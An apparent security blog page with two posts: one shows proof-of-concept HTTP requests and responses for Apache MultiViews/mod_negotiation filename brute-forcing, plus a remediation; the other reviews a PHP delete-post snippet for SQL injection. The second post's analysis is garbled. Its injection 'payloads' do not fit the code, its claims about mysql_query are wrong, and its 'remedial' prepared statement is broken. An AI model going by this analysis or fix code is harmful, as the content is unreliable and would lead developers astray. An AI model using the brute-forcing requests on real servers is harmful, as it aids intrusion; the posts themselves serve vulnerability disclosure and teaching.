16/02/2015

Apache mod_negotiation or MultiViews filename bruteforcing

Filename Brute-forcing through MultiViews Vulnerability


This is a small post about a way to easily get backup files on Apache web servers with Multiviews option enabled. There is no much information in Multiviews (an Apache feature) and some Web Application scanners report this as Apache mod_negotiation filename brute-forcing rather than Multiviews option enabled. Apache HTTPD supports content negotiation as described in the HTTP/1.1 specification (see http://www.w3.org/Protocols/rfc2616/rfc2616.html). It can choose the best representation of a resource based on the browser-supplied preferences for media type, languages, character set and encoding. It also implements a couple of features to give more intelligent handling of requests from browsers that send incomplete negotiation information.

What are resources

A resource is a conceptual entity identified by a URI (RFC 2396). An HTTP server like Apache HTTP Server provides access to representations of the resource(s) within its namespace, with each representation in the form of a sequence of bytes with a defined media type, character set, encoding, etc. Each resource may be associated with zero, one, or more than one representation at any given time. If multiple representations are available, the resource is referred to as negotiable and each of its representations is termed a variant. The ways in which the variants for a negotiable resource vary are called the dimensions of negotiation.

Negotiation in httpd

In order to negotiate a resource, the server needs to be given information about each of the variants. This is done in one of two ways:
  • Using a type map (i.e., a *.var file) which names the files containing the variants explicitly, or
  • Using a 'MultiViews' search, where the server does an implicit filename pattern match and chooses from among the results.
Using MultiViews to brute-force files

MultiViews is a per-directory option, meaning it can be set with an Options directive within a <Directory>, <Location> or <Files> section in httpd.conf, or (if AllowOverride is properly set) in .htaccess files.

The effect of MultiViews is as follows: if the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.

MultiViews is an Apache option which acts with the following rules:

"if you request from the server a file e.g. /some/dir/foo and does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements."

Impact

An attacker can use this functionality to aid in finding hidden file processes on the directory and potentially gather further sensitive information through the mod_negotiation module. mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, and look for backup files and so on.

Proof Of Concept

Example 1:

Request:

GET /mymanual/de/glossarry.html HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/xxx; q=1.0
Negotiate:*
User-Agent: xxx
Connection: close
Referer: http://xxx.xxx.xxx.xxx/test/se/
Cookie: LangID=2; PHPSESSID=xxxx


Response:

HTTP/1.1 300 Multiple Choices
Date: Tue, 16 Sep 2014 12:56:46 GMT
Server: Apache/2.2.22 (Linux/SUSE)
Alternates: {"glossary.html.de" 1 {type text/html} {charset iso-8859-1} {language de} {length 32714}}, {"glossary.html.en" 1 {type text/html} {charset iso-8859-1} {language en} {length 27855}}, {"glossary.html.es" 1 {type text/html} {charset iso-8859-1} {language es} {length 23586}}, {"glossary.html.fr" 1 {type text/html} {charset iso-8859-1} {language fr} {length 30561}}, {"glossary.html.ja.utf8" 1 {type text/html} {charset utf-8} {language ja} {length 30880}}, {"glossary.html.ko.euc-kr" 1 {type text/html} {charset euc-kr} {language ko} {length 19474}}, {"glossary.html.tr.utf8" 1 {type text/html} {charset utf-8} {language tr} {length 30911}}
Vary: negotiate,accept-language,accept-charset
TCN: list
Content-Length: 1039
Connection: close
Content-Type: text/html; charset=iso-8859-1
…[omitted]…
Note: In the first example we request for a specific file, the glossary.html and get the response displayed above.

Example 2:



Request:

GET /ba* HTTP/1.1
Host:xxx
Accept: application/whatever; q=1.0
Accept-charset: iso-8859-9
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
Connection: close
Referer: http://xxx.xxx.xxx.xxx/manual/de/
Cookie: LangID=2; PHPSESSID=xxxx





Response:

HTTP/1.1 404 Not Found
Date: Tue, 16 Sep 2014 13:33:18 GMT
Server: Apache/2.2.22 (Linux/SUSE)
Alternates: {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language cs} {length 745}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language de} {length 766}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language en} {length 611}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {language es} {length 699}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language fr} {length 789}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language ga} {length 813}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language it} {length 692}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-2022-jp} {language ja} {length 749}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset euc-kr} {language ko} {length 703}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language nl} {length 688}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language pl} {length 707}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language pt-br} {length 753}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language pt} {length 272}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language ro} {length 689}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-5} {language sr} {length 716}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language sv} {length 722}}, {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-9} {language tr} {length 755}}
Vary: accept-language,accept-charset
Content-Length: 409
Connection: close
Content-Type: text/html; charset=iso-8859-1
…[omitted]…


Note: In this example we request a file name using wild card characters e.g. *. More specifically .

Remediation 

Disable the MultiViews directive from Apache's configuration file and restart Apache. You can disable MultiViews by creating a .htaccess file containing the following line:

Options -Multiviews

References:
  1. http://www.wisec.it/sectou.php?id=4698ebdc59d15
  2. http://www.acunetix.com/vulnerabilities/apache-mod_negotiation-fi/
  3. http://www.securityfocus.com/bid/3009

17/04/2014

PHP Source Code Chunks of Insanity (Delete Post Pages) Part 4

Intro 

This post is going to talk about source code reviewing PHP and demonstrate how a relatively small chunk of code can cause you lots of problems.

The Code

In this article we are going to analyze the code displayed below. The code displayed below might seem innocent for some , but obviously is not. We are going to assume that is used by some web site to delete posts from the logged in users securely.
 <?php  
 require_once 'common.php';   
 validatemySession();   
 mydatabaseConnect();  
  $username = $_SESSION['username'];// Insecure source  
 $username = stripslashes($username);// Improper filtering  
 $username = mysql_real_escape_string($username);//Flawed function  
 // Delete the post that matches the postId ensuring that it was created by this user  
  $queryDelete = "DELETE FROM posts WHERE PostId = " . (int) $_GET['postId']. " AND Username = '$username'";  
  if (mysql_query($queryDelete))// Bad validation coding {  
       header('Location: myPosts.php'); }  
  else {  
      echo "An error has occurred.";   
      }  
 ?>  

If you look carefully the code you will se that the code is vulnerable to the following issue: SQL Injection!!
    
Think this is not accurate , think better.

The SQL Injection

An adversary in order to exploit this vulnerability would not have to script custom tools, would only have to have good knowledge of SQL injections methodologies and exposure to PHP coding.

Vulnerable Code:

1st Code Chunk 
 $username = $_SESSION['username'];// Insecure source  
 $username = stripslashes($username);// Improper filtering 
 $username = mysql_real_escape_string($username);//Flawed function  
2nd Code Chunk: 
 $queryDelete = "DELETE FROM posts WHERE PostId = " . (int) $_GET['postId']. " AND Username = '$username'";  
3rd Code Chunk:    
 if (mysql_query($queryDelete))  

The mysql_real_escape_string function is based in the black list mentality. What it does is that escapes special characters in the un-­‐escaped string, taking into account the current character set of the connection so that it is safe to place it in a mysql_query. More specifically mysql_real_escape_string calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters:

1. \x00 
2. \n
3. \r
4. \
5. '
6. “

7. \x1a.

Due to this odd behavior characters such as the % and SQL keywords are not being affected, so queries that have the form of e.g. SELECT BENCHMARK(50,MD5(CHAR(118))) would be executed normally. A realistic scenario would be to use a query such as the one below:

Step1: SQL Payload that would cause the post to delete without the postId be known. 
 LIKE %’s’  

Note1: At this point we assume that the attacker knows the format of the username e.g. its user plus a two-­‐digit number. 

Step2: SQL Payload mutated in order to bypass the filters.
 LIKE CHAR(37, 8217, 115, 8217)  

Note2: Further expanding on the attack if the Web App does not have a standard format for the usernames then the adversary can brute-­‐force the username first latter e.g. try out all English letters e.g. LIKE %’a’, LIKE %’b’, LIKE %’c’ ... etc. and eventually execute the query with a valid first username letter. Translating that to an obfuscated SQL Payload would be LIKE CHAR(39, 97, 37, 39), LIKE CHAR(39, 98, 37, 39) etc.

Note3: The mysql_real_escape_string function is deprecated as of PHP 5.5.0, and will be removed in the future. Instead, the MySQLi or PDO_MySQL extension should be used. Alternatives to this function include: mysqli_real_escape_string and PDO::quote. The mysql_query() function sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier. In this specific code example the query returns true if a record is found (any record). This obscure behavior introduces the vulnerability combined of course with the above code. The function used in the mysql_query statement should return a record set only if the correct record set is returned and not just any match.

Note4: This extension is deprecated as of PHP 5.5.0.

Remedial Code:

Provide Server Side filters filter for remediating the vulnerability. Make use of strongly typed parameterized queries (using the bind_param).
 // Using prepared Statements.  
 if ($stmt = $mysqli-­‐>prepare("DELETE FROM posts WHERE PostId = ? AND Username = ? LIMIT 1"))  
 {  
 $stmt-­‐>bind_param('s', $ username); // Bind "$ username" to parameter. 
 $stmt-­‐>execute(); // Execute the prepared statement.  
 ...  
 }